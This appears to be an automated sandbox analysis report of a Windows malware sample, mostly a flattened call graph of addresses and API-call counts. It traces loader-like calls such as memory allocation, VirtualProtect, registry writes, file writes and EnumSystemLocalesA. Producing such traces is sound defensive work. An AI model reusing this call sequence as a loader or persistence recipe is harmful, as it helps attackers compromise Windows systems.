calls 60230->60234 60233 3234824 11 API calls 60231->60233 60235 3234824 11 API calls 60232->60235 60236 3256b75 60233->60236 60237 32563b6 60234->60237 60238 325589b 60235->60238 60240 32347b0 11 API calls 60236->60240 60239 32347b0 11 API calls 60237->60239 60241 32347b0 11 API calls 60238->60241 60243 32563ed 60239->60243 60242 3256bac 60240->60242 60244 32558d2 60241->60244 60245 3247be8 17 API calls 60242->60245 60246 3247be8 17 API calls 60243->60246 60247 3247be8 17 API calls 60244->60247 60248 3256bd0 60245->60248 60249 3256411 60246->60249 60250 32558f6 60247->60250 60251 3234824 11 API calls 60248->60251 60252 3234824 11 API calls 60249->60252 60253 3234824 11 API calls 60250->60253 60254 3256bf1 60251->60254 60255 3256432 60252->60255 60256 3255917 60253->60256 60257 32347b0 11 API calls 60254->60257 60258 32347b0 11 API calls 60255->60258 60259 32347b0 11 API calls 60256->60259 60260 3256c28 60257->60260 60261 3256469 60258->60261 60262 325594e 60259->60262 60263 3247be8 17 API calls 60260->60263 60264 3247be8 17 API calls 60261->60264 60267 3247be8 17 API calls 60262->60267 60265 3256c4c 60263->60265 60266 325648d 60264->60266 60268 3234824 11 API calls 60265->60268 60269 3234824 11 API calls 60266->60269 60270 3255972 60267->60270 60271 3256c6d 60268->60271 60272 32564ae 60269->60272 60846 3249e70 29 API calls 60270->60846 60275 32347b0 11 API calls 60271->60275 60276 32347b0 11 API calls 60272->60276 60274 3255999 60277 3234824 11 API calls 60274->60277 60279 3256ca4 60275->60279 60278 32564e5 60276->60278 60280 32559ba 60277->60280 60282 3247be8 17 API calls 60278->60282 60281 3247be8 17 API calls 60279->60281 60284 32347b0 11 API calls 60280->60284 60291 3256cc8 60281->60291 60283 3256509 60282->60283 60285 3234824 11 API calls 60283->60285 60287 32559f1 60284->60287 60289 325652a 60285->60289 60286 32574a8 60288 3234824 11 API calls 60286->60288 60290 3247be8 17 API calls 60287->60290 60296 32574c9 60288->60296 60294 32347b0 11 API calls 60289->60294 60292 3255a15 60290->60292 60291->60286 60293 3234824 11 API calls 60291->60293 60295 3234824 11 API calls 60292->60295 60298 3256d13 60293->60298 60299 3256561 60294->60299 60300 3255a36 60295->60300 60297 32347b0 11 API calls 60296->60297 60304 3257500 60297->60304 60302 32347b0 11 API calls 60298->60302 60301 3247be8 17 API calls 60299->60301 60305 32347b0 11 API calls 60300->60305 60303 3256585 60301->60303 60308 3256d4a 60302->60308 60306 3234824 11 API calls 60303->60306 60307 3247be8 17 API calls 60304->60307 60311 3255a6d 60305->60311 60313 32565a6 60306->60313 60309 3257524 60307->60309 60312 3247be8 17 API calls 60308->60312 60310 3234824 11 API calls 60309->60310 60320 3257545 60310->60320 60314 3247be8 17 API calls 60311->60314 60315 3256d6e 60312->60315 60318 32347b0 11 API calls 60313->60318 60316 3255a91 60314->60316 60317 3234824 11 API calls 60315->60317 60319 3234824 11 API calls 60316->60319 60322 3256d8f 60317->60322 60323 32565dd 60318->60323 60324 3255ab2 60319->60324 60321 32347b0 11 API calls 60320->60321 60327 325757c 60321->60327 60325 32347b0 11 API calls 60322->60325 60326 3247be8 17 API calls 60323->60326 60328 32347b0 11 API calls 60324->60328 60332 3256dc6 60325->60332 60329 3256601 60326->60329 60331 3247be8 17 API calls 60327->60331 60335 3255ae9 60328->60335 60330 3234824 11 API calls 60329->60330 60337 3256622 60330->60337 60333 32575a0 60331->60333 60336 3247be8 17 API calls 60332->60336 60334 3234824 11 API calls 60333->60334 60343 32575c1 60334->60343 60339 3247be8 17 API calls 60335->60339 60338 3256dea 60336->60338 60341 32347b0 11 API calls 60337->60341 60340 3234824 11 API calls 60338->60340 60342 3255b0d 60339->60342 60346 3256e0b 60340->60346 60347 3256659 60341->60347 60344 3234824 11 API calls 60342->60344 60345 32347b0 11 API calls 60343->60345 60350 3255b4d 60344->60350 60352 32575f8 60345->60352 60348 32347b0 11 API calls 60346->60348 60349 3247be8 17 API calls 60347->60349 60357 3256e42 60348->60357 60351 325667d 60349->60351 60355 32347b0 11 API calls 60350->60355 60353 3232ee0 2 API calls 60351->60353 60354 3247be8 17 API calls 60352->60354 60356 3256682 60353->60356 60361 325761c 60354->60361 60362 3255b84 60355->60362 60359 3234824 11 API calls 60356->60359 60358 3247be8 17 API calls 60357->60358 60360 3256e66 60358->60360 60368 32566bb 60359->60368 60849 324d198 60360->60849 60365 3247be8 17 API calls 60361->60365 60366 3247be8 17 API calls 60362->60366 60372 325764f 60365->60372 60369 3255ba8 60366->60369 60367 3234824 11 API calls 60373 3256eaa 60367->60373 60371 32347b0 11 API calls 60368->60371 60370 3234824 11 API calls 60369->60370 60374 3255bc9 60370->60374 60377 32566f2 60371->60377 60375 3247be8 17 API calls 60372->60375 60376 3234824 11 API calls 60373->60376 60378 32347b0 11 API calls 60374->60378 60380 3257682 60375->60380 60383 3256ee2 60376->60383 60379 3247be8 17 API calls 60377->60379 60385 3255c00 60378->60385 60381 3256716 60379->60381 60384 3247be8 17 API calls 60380->60384 60382 3234824 11 API calls 60381->60382 60388 3256737 60382->60388 60386 32347b0 11 API calls 60383->60386 60390 32576b5 60384->60390 60387 3247be8 17 API calls 60385->60387 60392 3256f19 60386->60392 60389 3255c24 60387->60389 60393 32347b0 11 API calls 60388->60393 60391 3234824 11 API calls 60389->60391 60394 3247be8 17 API calls 60390->60394 60397 3255c45 60391->60397 60395 3247be8 17 API calls 60392->60395 60401 325676e 60393->60401 60396 32576e8 60394->60396 60398 3256f3d 60395->60398 60399 3234824 11 API calls 60396->60399 60402 32347b0 11 API calls 60397->60402 60400 3234824 11 API calls 60398->60400 60405 3257709 60399->60405 60406 3256f5e 60400->60406 60403 3247be8 17 API calls 60401->60403 60409 3255c7c 60402->60409 60404 3256792 60403->60404 60407 3234824 11 API calls 60404->60407 60408 32347b0 11 API calls 60405->60408 60410 32347b0 11 API calls 60406->60410 60412 32567b3 60407->60412 60414 3257740 60408->60414 60411 3247be8 17 API calls 60409->60411 60415 3256f95 60410->60415 60413 3255ca0 60411->60413 60416 32347b0 11 API calls 60412->60416 60847 3245aa8 42 API calls 60413->60847 60418 3247be8 17 API calls 60414->60418 60420 3247be8 17 API calls 60415->60420 60426 32567ea 60416->60426 60421 3257764 60418->60421 60419 3255ccc 60424 3234b90 11 API calls 60419->60424 60422 3256fb9 60420->60422 60423 3234824 11 API calls 60421->60423 60856 3237e18 60422->60856 60436 3257785 60423->60436 60427 3255ce1 60424->60427 60432 3247be8 17 API calls 60426->60432 60429 3234824 11 API calls 60427->60429 60440 3255d02 60429->60440 60430 32572a2 60435 3234824 11 API calls 60430->60435 60431 3256fcb 60433 3234824 11 API calls 60431->60433 60434 325680e GetCurrentProcess 60432->60434 60443 3256fec 60433->60443 60839 3247968 GetModuleHandleW GetProcAddress NtAllocateVirtualMemory 60434->60839 60442 32572c3 60435->60442 60439 32347b0 11 API calls 60436->60439 60438 3256828 60441 3234824 11 API calls 60438->60441 60447 32577bc 60439->60447 60444 32347b0 11 API calls 60440->60444 60448 325684e 60441->60448 60446 32347b0 11 API calls 60442->60446 60445 32347b0 11 API calls 60443->60445 60452 3255d39 60444->60452 60453 3257023 60445->60453 60454 32572fa 60446->60454 60449 3247be8 17 API calls 60447->60449 60450 32347b0 11 API calls 60448->60450 60451 32577e0 60449->60451 60461 3256885 60450->60461 60455 3234824 11 API calls 60451->60455 60456 3247be8 17 API calls 60452->60456 60458 3247be8 17 API calls 60453->60458 60459 3247be8 17 API calls 60454->60459 60465 3257801 60455->60465 60457 3255d5d 60456->60457 60466 32349bc 11 API calls 60457->60466 60460 3257047 60458->60460 60462 325731e 60459->60462 60463 3234824 11 API calls 60460->60463 60467 3247be8 17 API calls 60461->60467 60464 3234824 11 API calls 60462->60464 60473 3257068 60463->60473 60474 325733f 60464->60474 60470 32347b0 11 API calls 60465->60470 60468 3255d7a RtlMoveMemory 60466->60468 60469 32568a9 60467->60469 60471 3234824 11 API calls 60468->60471 60472 3234824 11 API calls 60469->60472 60476 3257838 60470->60476 60479 3255da1 60471->60479 60478 32568ca 60472->60478 60477 32347b0 11 API calls 60473->60477 60475 32347b0 11 API calls 60474->60475 60484 3257376 60475->60484 60480 3247be8 17 API calls 60476->60480 60483 325709f 60477->60483 60481 32347b0 11 API calls 60478->60481 60482 32347b0 11 API calls 60479->60482 60487 325785c 60480->60487 60490 3256901 60481->60490 60488 3255dd8 60482->60488 60485 3247be8 17 API calls 60483->60485 60486 3247be8 17 API calls 60484->60486 60489 32570c3 60485->60489 60491 325739a 60486->60491 60494 3247be8 17 API calls 60487->60494 60495 3247be8 17 API calls 60488->60495 60492 3234824 11 API calls 60489->60492 60496 3247be8 17 API calls 60490->60496 60493 3234824 11 API calls 60491->60493 60501 32570e4 60492->60501 60502 32573bb 60493->60502 60503 325788f 60494->60503 60497 3255dfc 60495->60497 60498 3256925 60496->60498 60499 3234824 11 API calls 60497->60499 60500 3234824 11 API calls 60498->60500 60507 3255e1d 60499->60507 60508 3256946 60500->60508 60504 32347b0 11 API calls 60501->60504 60505 32347b0 11 API calls 60502->60505 60506 3247be8 17 API calls 60503->60506 60511 325711b 60504->60511 60512 32573f2 60505->60512 60513 32578c2 60506->60513 60510 32347b0 11 API calls 60507->60510 60509 32347b0 11 API calls 60508->60509 60518 325697d 60509->60518 60520 3255e54 60510->60520 60514 3247be8 17 API calls 60511->60514 60515 3247be8 17 API calls 60512->60515 60516 3247be8 17 API calls 60513->60516 60517 325713f 60514->60517 60519 3257416 60515->60519 60529 32578f5 60516->60529 60860 324c74c 60517->60860 60525 3247be8 17 API calls 60518->60525 60522 3234824 11 API calls 60519->60522 60523 3247be8 17 API calls 60520->60523 60534 3257437 60522->60534 60526 3255e78 60523->60526 60528 32569a1 60525->60528 60530 3234824 11 API calls 60526->60530 60527 32344f4 11 API calls 60531 3257164 60527->60531 60840 32349bc 60528->60840 60535 3247be8 17 API calls 60529->60535 60538 3255e99 60530->60538 60532 3234824 11 API calls 60531->60532 60539 3257185 60532->60539 60537 32347b0 11 API calls 60534->60537 60541 3257928 60535->60541 60536 32569c5 60540 3234824 11 API calls 60536->60540 60543 325746e 60537->60543 60542 32347b0 11 API calls 60538->60542 60545 32347b0 11 API calls 60539->60545 60547 32569f4 60540->60547 60544 3247be8 17 API calls 60541->60544 60551 3255ed0 60542->60551 60548 3247be8 17 API calls 60543->60548 60546 325795b 60544->60546 60552 32571bc 60545->60552 60549 3234824 11 API calls 60546->60549 60553 32347b0 11 API calls 60547->60553 60550 3257492 60548->60550 60559 325797c 60549->60559 60554 32349bc 11 API calls 60550->60554 60556 3247be8 17 API calls 60551->60556 60557 3247be8 17 API calls 60552->60557 60564 3256a2b 60553->60564 60555 325749c 60554->60555 60880 3247f48 35 API calls 60555->60880 60560 3255ef4 60556->60560 60562 32571e0 60557->60562 60565 32347b0 11 API calls 60559->60565 60561 3234824 11 API calls 60560->60561 60567 3255f15 60561->60567 60563 3234824 11 API calls 60562->60563 60569 3257201 60563->60569 60566 3247be8 17 API calls 60564->60566 60571 32579b3 60565->60571 60568 3256a4f 60566->60568 60572 32347b0 11 API calls 60567->60572 60570 3234824 11 API calls 60568->60570 60573 32347b0 11 API calls 60569->60573 60576 3256a70 60570->60576 60574 3247be8 17 API calls 60571->60574 60579 3255f4c 60572->60579 60580 3257238 60573->60580 60575 32579d7 60574->60575 60577 3234824 11 API calls 60575->60577 60581 32347b0 11 API calls 60576->60581 60578 32579f8 60577->60578 60587 32347b0 11 API calls 60578->60587 60582 3247be8 17 API calls 60579->60582 60583 3247be8 17 API calls 60580->60583 60585 3256aa7 60581->60585 60584 3255f70 60582->60584 60593 325725c 60583->60593 60848 324a1c0 51 API calls 60584->60848 60588 3247be8 17 API calls 60585->60588 60592 3257a2f 60587->60592 60590 3256acb 60588->60590 60589 3255f81 60591 3234824 11 API calls 60590->60591 60596 3256aec 60591->60596 60595 3247be8 17 API calls 60592->60595 60865 324c3f8 60593->60865 60598 3257a53 60595->60598 60597 32347b0 11 API calls 60596->60597 60601 3256b23 60597->60601 60599 3247be8 17 API calls 60598->60599 60600 3257a86 60599->60600 60602 3234824 11 API calls 60600->60602 60603 3247be8 17 API calls 60601->60603 60605 3257aa7 60602->60605 60604 3256b47 EnumSystemLocalesA 60603->60604 60604->60231 60606 32347b0 11 API calls 60605->60606 60607 3257ade 60606->60607 60608 3247be8 17 API calls 60607->60608 60609 3257b02 60608->60609 60610 3234824 11 API calls 60609->60610 60611 3257b23 60610->60611 60612 32347b0 11 API calls 60611->60612 60613 3257b5a 60612->60613 60614 3247be8 17 API calls 60613->60614 60615 3257b7e 60614->60615 60616 3234824 11 API calls 60615->60616 60617 3257b9f 60616->60617 60618 32347b0 11 API calls 60617->60618 60619 3257bd6 60618->60619 60620 3247be8 17 API calls 60619->60620 60621 3257bfa 60620->60621 60622 3247be8 17 API calls 60621->60622 60623 3257c2d 60622->60623 60624 3247be8 17 API calls 60623->60624 60625 3257c60 60624->60625 60626 3247be8 17 API calls 60625->60626 60627 3257c93 60626->60627 60628 3247be8 17 API calls 60627->60628 60629 3257cc6 60628->60629 60630 3234824 11 API calls 60629->60630 60631 3257ce7 60630->60631 60632 32347b0 11 API calls 60631->60632 60633 3257d1e 60632->60633 60634 3247be8 17 API calls 60633->60634 60635 3257d42 60634->60635 60636 3234824 11 API calls 60635->60636 60637 3257d63 60636->60637 60638 32347b0 11 API calls 60637->60638 60639 3257d9a 60638->60639 60640 3247be8 17 API calls 60639->60640 60641 3257dbe 60640->60641 60642 3247be8 17 API calls 60641->60642 60643 3257df1 60642->60643 60644 3247be8 17 API calls 60643->60644 60645 3257e24 60644->60645 60646 3247be8 17 API calls 60645->60646 60647 3257e57 60646->60647 60648 3247be8 17 API calls 60647->60648 60649 3257e8a 60648->60649 60650 3247be8 17 API calls 60649->60650 60651 3257ebd 60650->60651 60652 3234824 11 API calls 60651->60652 60653 3257ede 60652->60653 60654 32347b0 11 API calls 60653->60654 60655 3257f15 60654->60655 60656 3247be8 17 API calls 60655->60656 60657 3257f39 60656->60657 60658 3234824 11 API calls 60657->60658 60659 3257f5a 60658->60659 60660 32347b0 11 API calls 60659->60660 60661 3257f91 60660->60661 60662 3247be8 17 API calls 60661->60662 60663 3257fb5 60662->60663 60664 3234824 11 API calls 60663->60664 60665 3257fd6 60664->60665 60666 32347b0 11 API calls 60665->60666 60667 325800d 60666->60667 60668 3247be8 17 API calls 60667->60668 60669 3258031 60668->60669 60670 3234824 11 API calls 60669->60670 60671 3258052 60670->60671 60672 32347b0 11 API calls 60671->60672 60673 3258089 60672->60673 60674 3247be8 17 API calls 60673->60674 60675 32580ad 60674->60675 60676 3234824 11 API calls 60675->60676 60677 32580ce 60676->60677 60678 32347b0 11 API calls 60677->60678 60679 3258105 60678->60679 60680 3247be8 17 API calls 60679->60680 60681 3258129 60680->60681 60682 3247be8 17 API calls 60681->60682 60683 3258138 60682->60683 60684 3247be8 17 API calls 60683->60684 60685 3258147 60684->60685 60686 3247be8 17 API calls 60685->60686 60687 3258156 60686->60687 60688 3247be8 17 API calls 60687->60688 60689 3258165 60688->60689 60690 3247be8 17 API calls 60689->60690 60691 3258174 60690->60691 60692 3247be8 17 API calls 60691->60692 60693 3258183 60692->60693 60694 3247be8 17 API calls 60693->60694 60695 3258192 60694->60695 60696 3247be8 17 API calls 60695->60696 60697 32581a1 60696->60697 60698 3247be8 17 API calls 60697->60698 60699 32581b0 60698->60699 60700 3247be8 17 API calls 60699->60700 60701 32581bf 60700->60701 60702 3247be8 17 API calls 60701->60702 60703 32581ce 60702->60703 60704 3247be8 17 API calls 60703->60704 60705 32581dd 60704->60705 60706 3247be8 17 API calls 60705->60706 60707 32581ec 60706->60707 60708 3247be8 17 API calls 60707->60708 60709 32581fb 60708->60709 60710 3247be8 17 API calls 60709->60710 60711 325820a 60710->60711 60712 3234824 11 API calls 60711->60712 60713 325822b 60712->60713 60714 32347b0 11 API calls 60713->60714 60715 3258262 60714->60715 60716 3247be8 17 API calls 60715->60716 60717 3258286 60716->60717 60718 3234824 11 API calls 60717->60718 60719 32582a7 60718->60719 60720 32347b0 11 API calls 60719->60720 60721 32582de 60720->60721 60722 3247be8 17 API calls 60721->60722 60723 3258302 60722->60723 60724 3234824 11 API calls 60723->60724 60725 3258323 60724->60725 60726 32347b0 11 API calls 60725->60726 60727 325835a 60726->60727 60728 3247be8 17 API calls 60727->60728 60729 325837e 60728->60729 60730 3247be8 17 API calls 60729->60730 60731 32583b1 60730->60731 60732 3247be8 17 API calls 60731->60732 60733 32583e4 60732->60733 60734 3247be8 17 API calls 60733->60734 60735 3258417 60734->60735 60736 3247be8 17 API calls 60735->60736 60737 325844a 60736->60737 60738 3247be8 17 API calls 60737->60738 60739 325847d 60738->60739 60740 3247be8 17 API calls 60739->60740 60741 32584b0 60740->60741 60742 3247be8 17 API calls 60741->60742 60743 32584e3 60742->60743 60744 3234824 11 API calls 60743->60744 60745 3258504 60744->60745 60746 32347b0 11 API calls 60745->60746 60747 325853b 60746->60747 60748 3247be8 17 API calls 60747->60748 60749 325855f 60748->60749 60750 3234824 11 API calls 60749->60750 60751 3258580 60750->60751 60752 32347b0 11 API calls 60751->60752 60753 32585b7 60752->60753 60754 3247be8 17 API calls 60753->60754 60755 32585db 60754->60755 60756 3234824 11 API calls 60755->60756 60757 32585fc 60756->60757 60758 32347b0 11 API calls 60757->60758 60759 3258633 60758->60759 60760 3247be8 17 API calls 60759->60760 60761 3258657 60760->60761 60762 3247be8 17 API calls 60761->60762 60763 325868a 60762->60763 60764 3247be8 17 API calls 60763->60764 60765 32586bd 60764->60765 60766 3247be8 17 API calls 60765->60766 60767 32586f0 60766->60767 60768 3247be8 17 API calls 60767->60768 60769 3258723 60768->60769 60770 3247be8 17 API calls 60769->60770 60771 3258756 60770->60771 60772 3247be8 17 API calls 60771->60772 60773 3258789 60772->60773 60774 3247be8 17 API calls 60773->60774 60775 32587bc 60774->60775 60776 3247be8 17 API calls 60775->60776 60777 32587ef 60776->60777 60778 3247be8 17 API calls 60777->60778 60779 3258822 60778->60779 60780 3247be8 17 API calls 60779->60780 60781 3258855 60780->60781 60782 3247be8 17 API calls 60781->60782 60783 3258888 60782->60783 60784 3247be8 17 API calls 60783->60784 60785 32588bb 60784->60785 60786 3247be8 17 API calls 60785->60786 60787 32588ee 60786->60787 60788 3247be8 17 API calls 60787->60788 60789 3258921 60788->60789 60790 3247be8 17 API calls 60789->60790 60791 3258954 60790->60791 60792 3247be8 17 API calls 60791->60792 60793 3258987 60792->60793 60794 3247be8 17 API calls 60793->60794 60795 32589ba 60794->60795 60796 3247be8 17 API calls 60795->60796 60797 32589ed 60796->60797 60798 3247be8 17 API calls 60797->60798 60799 3258a20 60798->60799 60800 3234824 11 API calls 60799->60800 60801 3258a41 60800->60801 60802 32347b0 11 API calls 60801->60802 60803 3258a78 60802->60803 60804 3247be8 17 API calls 60803->60804 60805 3258a9c 60804->60805 60806 3234824 11 API calls 60805->60806 60807 3258abd 60806->60807 60808 32347b0 11 API calls 60807->60808 60809 3258af4 60808->60809 60810 3247be8 17 API calls 60809->60810 60811 3258b18 60810->60811 60812 3234824 11 API calls 60811->60812 60813 3258b39 60812->60813 60814 32347b0 11 API calls 60813->60814 60815 3258b70 60814->60815 60816 3247be8 17 API calls 60815->60816 60817 3258b94 ExitProcess 60816->60817 60819 3247bfd 60818->60819 60820 3247c05 LoadLibraryW GetModuleHandleW 60819->60820 60821 3234964 60820->60821 60822 3247c30 GetProcAddress 60821->60822 60881 3247b20 60822->60881 60824 3247c57 60890 32344c4 60824->60890 60828 324d32f 60827->60828 60829 324d35a RegOpenKeyA 60828->60829 60830 324d368 60829->60830 60831 32349bc 11 API calls 60830->60831 60832 324d380 60831->60832 60833 324d38d RegSetValueExA RegCloseKey 60832->60833 60834 324d3b1 60833->60834 60835 32344c4 11 API calls 60834->60835 60836 324d3be 60835->60836 60837 32344a0 11 API calls 60836->60837 60838 324d3c6 60837->60838 60838->60125 60839->60438 60841 3234970 60840->60841 60842 3234564 11 API calls 60841->60842 60843 32349ab 60841->60843 60844 3234987 60842->60844 60843->60536 60844->60843 60900 3232c2c 11 API calls 60844->60900 60846->60274 60847->60419 60848->60589 60850 324d1bd 60849->60850 60851 324d1e9 60850->60851 60901 3234688 11 API calls 60850->60901 60902 32344f4 11 API calls 60850->60902 60852 32344a0 11 API calls 60851->60852 60854 324d1fe 60852->60854 60854->60367 60857 3234964 60856->60857 60858 3237e22 GetFileAttributesA 60857->60858 60859 3237e2d 60858->60859 60859->60430 60859->60431 60861 3234b90 11 API calls 60860->60861 60862 324c764 60861->60862 60863 324c785 60862->60863 60864 32349bc 11 API calls 60862->60864 60863->60527 60864->60862 60866 324c40e 60865->60866 60903 3234ee4 60866->60903 60868 324c416 60869 324c436 RtlDosPathNameToNtPathName_U 60868->60869 60909 324c340 60869->60909 60871 324c452 NtCreateFile 60872 324c47d 60871->60872 60873 32349bc 11 API calls 60872->60873 60874 324c48f NtWriteFile NtClose 60873->60874 60875 324c4b9 60874->60875 60910 3234c24 60875->60910 60878 32344a0 11 API calls 60879 324c4c9 60878->60879 60879->60430 60880->60286 60894 3234538 60881->60894 60884 32347b0 11 API calls 60885 3247b53 60884->60885 60886 3247b5b GetModuleHandleA GetProcAddress VirtualProtect 60885->60886 60887 3247b97 60886->60887 60888 32344c4 11 API calls 60887->60888 60889 3247ba4 60888->60889 60889->60824 60892 32344ca 60890->60892 60891 32344f0 60891->60097 60892->60891 60899 3232c2c 11 API calls 60892->60899 60896 323453c 60894->60896 60895 3234560 60895->60884 60896->60895 60898 3232c2c 11 API calls 60896->60898 60898->60895 60899->60892 60900->60843 60901->60850 60902->60850 60904 3234f00 60903->60904 60905 3234eea SysAllocStringLen 60903->60905 60904->60868 60905->60904 60906 3234bf4 60905->60906 60907 3234c10 60906->60907 60908 3234c00 SysAllocStringLen 60906->60908 60907->60868 60908->60906 60908->60907 60909->60871 60911 3234c2a SysFreeString 60910->60911 60912 3234c38 60910->60912 60911->60912 60912->60878 60913 15ca9de4 60914 15ca9e02 _wcslen 60913->60914 60915 15ca9e0d 60914->60915 60916 15ca9e24 60914->60916 60954 15cada34 60915->60954 60918 15cada34 34 API calls 60916->60918 60920 15ca9e2c 60918->60920 61014 15ca1f13 30 API calls 60920->61014 60923 15ca9e3a 61015 15ca1f09 11 API calls 60923->61015 60925 15ca9e42 61016 15ca915b 30 API calls 60925->61016 60928 15ca9e79 60939 15caa109 60928->60939 60929 15ca9e54 61017 15ca3014 30 API calls 60929->61017 60933 15ca9e5f 61018 15ca1f13 30 API calls 60933->61018 60935 15ca9e69 61019 15ca1f09 11 API calls 60935->61019 60937 15ca9e1f 60938 15ca1f09 11 API calls 60937->60938 60938->60928 60940 15caa127 60939->60940 61020 15cb3549 RegOpenKeyExA 60940->61020 60943 15caa15c 61025 15ca905c 30 API calls 60943->61025 60944 15caa142 60945 15caa147 60944->60945 60946 15ca9e9b 60944->60946 61023 15ca905c 30 API calls 60945->61023 60948 15caa16a 61026 15caa179 87 API calls 60948->61026 60951 15caa155 61024 15caa22d 31 API calls 60951->61024 60953 15caa15a 60953->60946 61027 15ca1f86 60954->61027 60957 15cada70 61037 15cbb5b4 31 API calls 60957->61037 60958 15cadaa5 61040 15cbbfb7 GetCurrentProcess IsWow64Process 60958->61040 60959 15cada66 60961 15cadb99 GetLongPathNameW 60959->60961 61031 15ca417e 60961->61031 60963 15cadaaa 60966 15cadaae 60963->60966 60967 15cadb00 60963->60967 60964 15cada79 61038 15ca1f13 30 API calls 60964->61038 60971 15ca417e 30 API calls 60966->60971 60970 15ca417e 30 API calls 60967->60970 60975 15cadb0e 60970->60975 60976 15cadabc 60971->60976 60972 15cada83 61039 15ca1f09 11 API calls 60972->61039 60973 15ca417e 30 API calls 60974 15cadbbd 60973->60974 61049 15caddd1 30 API calls 60974->61049 60981 15ca417e 30 API calls 60975->60981 60982 15ca417e 30 API calls 60976->60982 60979 15cadbd0 61050 15ca2fa5 30 API calls 60979->61050 60984 15cadb24 60981->60984 60985 15cadad2 60982->60985 60983 15cadbdb 61051 15ca2fa5 30 API calls 60983->61051 61045 15ca2fa5 30 API calls 60984->61045 61041 15ca2fa5 30 API calls 60985->61041 60989 15cadbe5 61052 15ca1f09 11 API calls 60989->61052 60990 15cadb2f 61046 15ca1f13 30 API calls 60990->61046 60991 15cadadd 61042 15ca1f13 30 API calls 60991->61042 60995 15cadbef 61053 15ca1f09 11 API calls 60995->61053 60996 15cadb3a 61047 15ca1f09 11 API calls 60996->61047 60997 15cadae8 61043 15ca1f09 11 API calls 60997->61043 61001 15cadbf8 61054 15ca1f09 11 API calls 61001->61054 61002 15cadb43 61048 15ca1f09 11 API calls 61002->61048 61003 15cadaf1 61044 15ca1f09 11 API calls 61003->61044 61007 15cadc01 61055 15ca1f09 11 API calls 61007->61055 61008 15cadafa 61008->60972 61010 15cadc0a 61056 15ca1f09 11 API calls 61010->61056 61012 15ca9e15 61013 15ca1f13 30 API calls 61012->61013 61013->60937 61014->60923 61015->60925 61016->60929 61017->60933 61018->60935 61019->60937 61021 15cb3573 RegQueryValueExA RegCloseKey 61020->61021 61022 15caa12e 61020->61022 61021->61022 61022->60943 61022->60944 61023->60951 61024->60953 61025->60948 61026->60946 61028 15ca1f8e 61027->61028 61057 15ca2252 61028->61057 61030 15ca1f99 61030->60957 61030->60958 61030->60959 61032 15ca4186 61031->61032 61033 15ca2252 11 API calls 61032->61033 61034 15ca4191 61033->61034 61062 15ca41bc 30 API calls 61034->61062 61036 15ca419c 61036->60973 61037->60964 61038->60972 61039->60959 61040->60963 61041->60991 61042->60997 61043->61003 61044->61008 61045->60990 61046->60996 61047->61002 61048->61008 61049->60979 61050->60983 61051->60989 61052->60995 61053->61001 61054->61007 61055->61010 61056->61012 61058 15ca22ac 61057->61058 61059 15ca225c 61057->61059 61058->61030 61059->61058 61061 15ca2779 11 API calls std::_Deallocate 61059->61061 61061->61058 61062->61036 61063 3231c6c 61064 3231d04 61063->61064 61065 3231c7c 61063->61065 61066 3231f58 61064->61066 61067 3231d0d 61064->61067 61068 3231cc0 61065->61068 61069 3231c89 61065->61069 61073 3231fec 61066->61073 61074 3231f68 61066->61074 61084 3231fac 61066->61084 61070 3231e24 61067->61070 61080 3231d25 61067->61080 61071 3231724 10 API calls 61068->61071 61072 3231c94 61069->61072 61111 3231724 61069->61111 61090 3231e55 Sleep 61070->61090 61091 3231e7c 61070->61091 61097 3231e95 61070->61097 61081 3231cd7 61071->61081 61077 3231724 10 API calls 61074->61077 61075 3231d2c 61096 3231f82 61077->61096 61078 3231724 10 API calls 61099 3231f2c 61078->61099 61079 3231d48 61092 3231d79 Sleep 61079->61092 61103 3231d9c 61079->61103 61080->61075 61080->61079 61087 3231dfc 61080->61087 61082 3231cfd 61081->61082 61101 3231a8c 8 API calls 61081->61101 61083 3231fb2 61084->61083 61088 3231724 10 API calls 61084->61088 61085 3231ca1 61086 3231cb9 61085->61086 61135 3231a8c 61085->61135 61093 3231724 10 API calls 61087->61093 61102 3231fc1 61088->61102 61089 3231fa7 61090->61091 61094 3231e6f Sleep 61090->61094 61091->61078 61091->61097 61095 3231d91 Sleep 61092->61095 61092->61103 61106 3231e05 61093->61106 61094->61070 61095->61079 61096->61089 61104 3231a8c 8 API calls 61096->61104 61099->61097 61105 3231a8c 8 API calls 61099->61105 61100 3231e1d 61101->61082 61102->61089 61107 3231a8c 8 API calls 61102->61107 61104->61089 61108 3231f50 61105->61108 61106->61100 61109 3231a8c 8 API calls 61106->61109 61110 3231fe4 61107->61110 61109->61100 61112 3231968 61111->61112 61113 323173c 61111->61113 61114 3231938 61112->61114 61115 3231a80 61112->61115 61123 32317cb Sleep 61113->61123 61125 323174e 61113->61125 61119 3231947 Sleep 61114->61119 61128 3231986 61114->61128 61117 3231684 VirtualAlloc 61115->61117 61118 3231a89 61115->61118 61116 323175d 61116->61085 61120 32316bf 61117->61120 61121 32316af 61117->61121 61118->61085 61122 323195d Sleep 61119->61122 61119->61128 61120->61085 61152 3231644 61121->61152 61122->61114 61123->61125 61127 32317e4 Sleep 61123->61127 61125->61116 61126 323182c 61125->61126 61129 323180a Sleep 61125->61129 61133 32315cc VirtualAlloc 61126->61133 61134 3231838 61126->61134 61127->61113 61130 32315cc VirtualAlloc 61128->61130 61132 32319a4 61128->61132 61129->61126 61131 3231820 Sleep 61129->61131 61130->61132 61131->61125 61132->61085 61133->61134 61134->61085 61136 3231aa1 61135->61136 61137 3231b6c 61135->61137 61139 3231aa7 61136->61139 61142 3231b13 Sleep 61136->61142 61138 32316e8 61137->61138 61137->61139 61141 3231c66 61138->61141 61143 3231644 2 API calls 61138->61143 61140 3231ab0 61139->61140 61145 3231b4b Sleep 61139->61145 61148 3231b81 61139->61148 61140->61086 61141->61086 61142->61139 61144 3231b2d Sleep 61142->61144 61146 32316f5 VirtualFree 61143->61146 61144->61136 61147 3231b61 Sleep 61145->61147 61145->61148 61149 323170d 61146->61149 61147->61139 61150 3231c00 VirtualFree 61148->61150 61151 3231ba4 61148->61151 61149->61086 61150->61086 61151->61086 61153 3231681 61152->61153 61154 323164d 61152->61154 61153->61120 61154->61153 61155 323164f Sleep 61154->61155 61156 3231664 61155->61156 61156->61153 61157 3231668 Sleep 61156->61157 61157->61154

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 0324D5D0 Relevance: 218.7, APIs: 9, Strings: 111, Instructions: 8669COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • InetIsOffline.URL(00000000,00000000,03258FB6,?,?,?,00000000,00000000), ref: 0324D604
